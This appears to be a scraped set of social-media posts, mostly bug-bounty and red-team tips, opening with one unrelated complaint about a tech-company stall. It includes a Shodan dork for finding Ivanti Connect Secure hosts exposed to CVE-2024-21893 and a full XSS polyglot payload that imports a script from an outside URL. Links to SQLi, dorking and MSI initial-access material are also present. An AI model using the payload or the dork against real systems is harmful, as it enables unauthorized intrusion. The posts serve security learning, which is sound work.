Just like galgotia university, Hcl technologies did the same thing, showing Chinese dog in the Hcltech stall , and claiming they build it, I don’t understand reason behind, by doing this cheap tricks in the end everyone knows so why ? #galgotia#hcl#hcltech
🛠️ LOLESXi: Living Off The Land ESXi
A comprehensive list of binaries/scripts natively available in VMware ESXi that adversaries have utilized in their operations
By @blueteam0ps_ and @wietze
https://t.co/LAYtTQMO2i
💀 SSRF leading to RCE in Ivanti Connect Secure. (CVE-2024-21893)
Dork for Shodan:
http.favicon.hash:-1439222863 html:"welcome.cgi?p=logo"
#web#cve#ssrf#rce#dork#bug
Use this #XSS payload to pop alert boxes EVERYWHERE! 😎 🏆
JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:\\https://t.co/GFfWFhdpK2))}//\76-->
🌟SQLi_Sleeps🌟
👉It is a simple script that allow to find SQLi vulnerabilities, obtaining the response time greater than 20 seconds per medium and time-based injection.
📥https://t.co/OcmjLUDPU9
📥https://t.co/Pz9cWGL18l
#bugbountytip#bugbountytips#ethicalhacking#sqli
Recon Tool: go-dork🔥🔥☄️☄️
#Day5
Go-dork by dwisiswant0 is a powerful and efficient command-line tool written in the Go programming language.
It is designed to be the fastest dork scanner available, streamlining the process of conducting advanced Google dork queries.
The tool supports various search engines, including Google, Shodan, Bing, DuckDuckGo, and Yahoo. It also provides an array of flags and options for customization, allowing users to tailor their searches based on specific criteria. This makes it an indispensable asset for security researchers, bug bounty hunters, and penetration testers.
Read the post: https://t.co/QMiVm8HSyh
#dorking #reconnaissance #pentesting #bugbounty #infosec #informationsecurity #cybersecurity
One good way to initial access is by using msi Shenanigans , it’s getting popular nowadays by hackers to get initial access, i have written a blog, explaining how can we exploit msi shenanigans.
https://t.co/jpgQ4NSFBC
#redteaming#malware#initialaccess
Here's 2 tools you can use to effectively find sensitive information in JS files:
1️⃣ Hakrawler - Extracting JavaScript files.
🔗Link : https://t.co/FebhrUA0c6
2️⃣ LinkFinder - Finding Endpoints in JS files.
🔗Link : https://t.co/PM2uVuhQUC
Do you use anything else?
Let us know
File Upload Cheatsheet
Where to find
In upload file feature, for example upload photo profile feature
How to exploit
read also this pdf it conayin a many of ideas
1-https://t.co/GiCuJ2vdS3
by 0xAwali
2-https://t.co/L9H3PGU7AO by ebrahim
hegazy
If your plan is to learn reverse engineering this year check out the resources I collected while learning RE:
https://github[dot]com/HACKE-RC/awesome-reversing